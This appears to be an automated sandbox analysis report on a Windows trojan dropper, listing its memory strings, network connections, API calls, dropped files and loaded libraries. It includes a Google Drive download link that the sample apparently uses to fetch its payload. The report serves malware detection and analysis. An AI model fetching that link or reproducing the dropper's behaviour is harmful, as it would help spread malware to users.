      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloade
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadid
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloads2
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadsz
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadt
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download~I
      Source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3417659482.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.4118336265.00000000034A3000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.000000000345C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3104612858.0000000003466000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49883 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49891 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49922 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49937 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49952 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49954 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49955 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49955 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49956 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49957 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49958 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49961 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49963 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49965 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49967 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49968 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49970 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49975 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49977 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49983 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49989 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49990 version: TLS 1.2
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Windows\Arder.lnkJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_004069450_2_00406945
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_0040711C0_2_0040711C
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_72A41A980_2_72A41A98
      Source: eAvqHiIsgR.exeStatic PE information: invalid certificate
      Source: eAvqHiIsgR.exe, 00000000.00000000.2053679157.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe
      Source: eAvqHiIsgR.exe, 00000005.00000000.3006856688.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe
      Source: eAvqHiIsgR.exeBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs eAvqHiIsgR.exe
      Source: eAvqHiIsgR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Users\user\tranchetJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Users\user\AppData\Local\Temp\nse2344.tmpJump to behavior
      Source: eAvqHiIsgR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: eAvqHiIsgR.exeReversingLabs: Detection: 60%
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile read: C:\Users\user\Desktop\eAvqHiIsgR.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"Jump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Arder.lnk.0.drLNK file: ..\Users\user\Disannex.And37
      Source: eAvqHiIsgR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp
